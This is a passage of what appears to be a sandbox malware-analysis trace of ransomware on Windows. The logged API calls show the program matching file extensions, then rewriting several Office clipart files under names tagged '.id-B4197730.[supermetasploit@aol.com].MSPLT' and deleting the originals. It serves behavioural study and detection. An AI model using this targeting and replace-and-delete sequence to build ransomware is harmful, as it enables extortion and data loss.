Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 68 [0315.591] lstrlenW (lpString=".1cd") returned 4 [0315.591] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0315.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 68 [0315.591] lstrlenW (lpString=".jpg") returned 4 [0315.592] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0315.592] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 68 [0315.592] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 68 [0315.592] lstrlenW (lpString=".doc") returned 4 [0315.592] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0315.592] lstrlenW (lpString=".docx") returned 5 [0315.592] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0315.592] lstrlenW (lpString=".pdf") returned 4 [0315.592] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0315.592] lstrlenW (lpString=".xls") returned 4 [0315.592] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0315.592] lstrlenW (lpString=".xlsx") returned 5 [0315.592] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0315.592] lstrlenW (lpString=".ppt") returned 4 [0315.592] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0315.592] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 68 [0315.592] lstrlenW (lpString=".zip") returned 4 [0315.592] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0315.592] lstrlenW (lpString=".rar") returned 4 [0315.592] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0315.592] lstrlenW (lpString=".bz2") returned 4 [0315.592] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0315.592] lstrlenW (lpString=".7z") returned 3 [0315.592] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0315.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 68 [0315.593] lstrlenW (lpString=".dbf") returned 4 [0315.593] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0315.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 68 [0315.593] lstrlenW (lpString=".1cd") returned 4 [0315.593] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0315.593] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 68 [0315.593] lstrlenW (lpString=".jpg") returned 4 [0315.593] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0315.593] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0315.593] lstrlenW (lpString="CUP.WMF") returned 7 [0315.593] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cup.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53c [0315.693] GetFileSizeEx (in: hFile=0x53c, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=2966) returned 1 [0315.693] CloseHandle (hObject=0x53c) returned 1 [0315.693] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cup.wmf")) returned 0x220 [0316.263] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cup.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0316.427] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cup.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x530 [0317.196] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0317.196] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0317.196] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cup.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53c [0317.280] GetLastError () returned 0x0 [0317.280] ReadFile (in: hFile=0x530, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0xb96, lpOverlapped=0x0) returned 1 [0317.302] WriteFile (in: hFile=0x53c, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xba0, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xba0, lpOverlapped=0x0) returned 1 [0317.304] ReadFile (in: hFile=0x530, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x0, lpOverlapped=0x0) returned 1 [0317.304] WriteFile (in: hFile=0x53c, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xe2, lpOverlapped=0x0) returned 1 [0317.304] SetEndOfFile (hFile=0x53c) returned 1 [0317.304] CloseHandle (hObject=0x53c) returned 1 [0317.305] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0317.305] SetEndOfFile (hFile=0x530) returned 1 [0318.058] CloseHandle (hObject=0x530) returned 1 [0318.058] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0318.890] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cup.wmf")) returned 1 [0319.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF") returned 63 [0319.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF") returned 63 [0319.110] lstrlenW (lpString=".doc") returned 4 [0319.110] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0319.110] lstrlenW (lpString=".docx") returned 5 [0319.110] lstrcmpiW (lpString1=".docx", lpString2="P.WMF") returned -1 [0319.110] lstrlenW (lpString=".pdf") returned 4 [0319.110] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0319.110] lstrlenW (lpString=".xls") returned 4 [0319.110] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0319.110] lstrlenW (lpString=".xlsx") returned 5 [0319.110] lstrcmpiW (lpString1=".xlsx", lpString2="P.WMF") returned -1 [0319.110] lstrlenW (lpString=".ppt") returned 4 [0319.110] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0319.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF") returned 63 [0319.110] lstrlenW (lpString=".zip") returned 4 [0319.110] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0319.110] lstrlenW (lpString=".rar") returned 4 [0319.110] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0319.110] lstrlenW (lpString=".bz2") returned 4 [0319.110] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0319.110] lstrlenW (lpString=".7z") returned 3 [0319.110] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0319.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF") returned 63 [0319.110] lstrlenW (lpString=".dbf") returned 4 [0319.110] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0319.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF") returned 63 [0319.110] lstrlenW (lpString=".1cd") returned 4 [0319.110] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0319.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF") returned 63 [0319.111] lstrlenW (lpString=".jpg") returned 4 [0319.111] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0319.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF") returned 63 [0319.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF") returned 63 [0319.565] lstrlenW (lpString=".doc") returned 4 [0319.565] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0319.565] lstrlenW (lpString=".docx") returned 5 [0319.565] lstrcmpiW (lpString1=".docx", lpString2="P.WMF") returned -1 [0319.565] lstrlenW (lpString=".pdf") returned 4 [0319.565] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0319.565] lstrlenW (lpString=".xls") returned 4 [0319.565] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0319.565] lstrlenW (lpString=".xlsx") returned 5 [0319.566] lstrcmpiW (lpString1=".xlsx", lpString2="P.WMF") returned -1 [0319.566] lstrlenW (lpString=".ppt") returned 4 [0319.566] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0319.566] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF") returned 63 [0319.566] lstrlenW (lpString=".zip") returned 4 [0319.566] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0319.566] lstrlenW (lpString=".rar") returned 4 [0319.566] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0319.566] lstrlenW (lpString=".bz2") returned 4 [0319.566] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0319.566] lstrlenW (lpString=".7z") returned 3 [0319.566] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0319.566] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF") returned 63 [0319.566] lstrlenW (lpString=".dbf") returned 4 [0319.566] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0319.566] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF") returned 63 [0319.566] lstrlenW (lpString=".1cd") returned 4 [0319.566] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0319.566] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CUP.WMF") returned 63 [0319.567] lstrlenW (lpString=".jpg") returned 4 [0319.567] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0319.567] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0319.567] lstrlenW (lpString="DD00413_.WMF") returned 12 [0319.567] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00413_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x538 [0319.568] GetFileSizeEx (in: hFile=0x538, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=42992) returned 1 [0319.568] CloseHandle (hObject=0x538) returned 1 [0319.568] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00413_.wmf")) returned 0x220 [0319.568] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00413_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0319.569] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00413_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x538 [0319.569] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.569] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.569] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00413_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x548 [0319.573] GetLastError () returned 0x0 [0319.573] ReadFile (in: hFile=0x538, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0xa7f0, lpOverlapped=0x0) returned 1 [0319.593] WriteFile (in: hFile=0x548, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xa800, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xa800, lpOverlapped=0x0) returned 1 [0319.595] ReadFile (in: hFile=0x538, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x0, lpOverlapped=0x0) returned 1 [0319.595] WriteFile (in: hFile=0x548, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xec, lpOverlapped=0x0) returned 1 [0319.596] SetEndOfFile (hFile=0x548) returned 1 [0319.596] CloseHandle (hObject=0x548) returned 1 [0319.596] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.596] SetEndOfFile (hFile=0x538) returned 1 [0319.605] CloseHandle (hObject=0x538) returned 1 [0319.605] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0319.610] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00413_.wmf")) returned 1 [0319.611] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 68 [0319.611] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 68 [0319.611] lstrlenW (lpString=".doc") returned 4 [0319.611] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0319.611] lstrlenW (lpString=".docx") returned 5 [0319.611] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0319.611] lstrlenW (lpString=".pdf") returned 4 [0319.611] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0319.611] lstrlenW (lpString=".xls") returned 4 [0319.611] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0319.611] lstrlenW (lpString=".xlsx") returned 5 [0319.611] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0319.611] lstrlenW (lpString=".ppt") returned 4 [0319.611] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0319.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 68 [0319.612] lstrlenW (lpString=".zip") returned 4 [0319.612] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0319.612] lstrlenW (lpString=".rar") returned 4 [0319.612] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0319.612] lstrlenW (lpString=".bz2") returned 4 [0319.612] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0319.612] lstrlenW (lpString=".7z") returned 3 [0319.612] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0319.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 68 [0319.612] lstrlenW (lpString=".dbf") returned 4 [0319.612] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0319.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 68 [0319.612] lstrlenW (lpString=".1cd") returned 4 [0319.612] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0319.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 68 [0319.612] lstrlenW (lpString=".jpg") returned 4 [0319.612] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0319.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 68 [0319.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 68 [0319.612] lstrlenW (lpString=".doc") returned 4 [0319.613] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0319.613] lstrlenW (lpString=".docx") returned 5 [0319.613] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0319.613] lstrlenW (lpString=".pdf") returned 4 [0319.613] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0319.613] lstrlenW (lpString=".xls") returned 4 [0319.613] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0319.613] lstrlenW (lpString=".xlsx") returned 5 [0319.613] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0319.613] lstrlenW (lpString=".ppt") returned 4 [0319.613] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0319.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 68 [0319.613] lstrlenW (lpString=".zip") returned 4 [0319.613] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0319.613] lstrlenW (lpString=".rar") returned 4 [0319.613] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0319.613] lstrlenW (lpString=".bz2") returned 4 [0319.613] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0319.613] lstrlenW (lpString=".7z") returned 3 [0319.613] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0319.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 68 [0319.613] lstrlenW (lpString=".dbf") returned 4 [0319.613] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0319.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 68 [0319.613] lstrlenW (lpString=".1cd") returned 4 [0319.613] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0319.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 68 [0319.613] lstrlenW (lpString=".jpg") returned 4 [0319.613] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0319.614] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0319.614] lstrlenW (lpString="DD00419_.WMF") returned 12 [0319.614] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00419_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x538 [0319.615] GetFileSizeEx (in: hFile=0x538, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=712) returned 1 [0319.615] CloseHandle (hObject=0x538) returned 1 [0319.616] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00419_.wmf")) returned 0x220 [0319.616] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00419_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0319.616] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00419_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x538 [0319.616] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.616] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.616] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00419_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x554 [0319.617] GetLastError () returned 0x0 [0319.617] ReadFile (in: hFile=0x538, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x2c8, lpOverlapped=0x0) returned 1 [0319.619] WriteFile (in: hFile=0x554, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0x2d0, lpOverlapped=0x0) returned 1 [0319.620] ReadFile (in: hFile=0x538, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x0, lpOverlapped=0x0) returned 1 [0319.620] WriteFile (in: hFile=0x554, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xec, lpOverlapped=0x0) returned 1 [0319.620] SetEndOfFile (hFile=0x554) returned 1 [0319.621] CloseHandle (hObject=0x554) returned 1 [0319.621] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.621] SetEndOfFile (hFile=0x538) returned 1 [0319.624] CloseHandle (hObject=0x538) returned 1 [0319.625] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0319.625] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00419_.wmf")) returned 1 [0319.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 68 [0319.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 68 [0319.626] lstrlenW (lpString=".doc") returned 4 [0319.626] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0319.626] lstrlenW (lpString=".docx") returned 5 [0319.627] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0319.627] lstrlenW (lpString=".pdf") returned 4 [0319.627] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0319.627] lstrlenW (lpString=".xls") returned 4 [0319.627] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0319.627] lstrlenW (lpString=".xlsx") returned 5 [0319.627] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0319.627] lstrlenW (lpString=".ppt") returned 4 [0319.627] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0319.627] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 68 [0319.627] lstrlenW (lpString=".zip") returned 4 [0319.627] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0319.627] lstrlenW (lpString=".rar") returned 4 [0319.627] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0319.627] lstrlenW (lpString=".bz2") returned 4 [0319.627] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0319.627] lstrlenW (lpString=".7z") returned 3 [0319.627] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0319.627] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 68 [0319.627] lstrlenW (lpString=".dbf") returned 4 [0319.627] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0319.627] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 68 [0319.627] lstrlenW (lpString=".1cd") returned 4 [0319.627] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0319.627] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 68 [0319.627] lstrlenW (lpString=".jpg") returned 4 [0319.627] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0319.628] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 68 [0319.628] lstrlenW (lpString="C:\\Program Files\\Microsoft 